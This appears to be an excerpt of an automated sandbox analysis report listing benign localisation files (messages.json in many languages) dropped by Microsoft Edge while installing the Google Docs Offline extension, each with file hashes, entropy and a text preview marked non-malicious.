                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
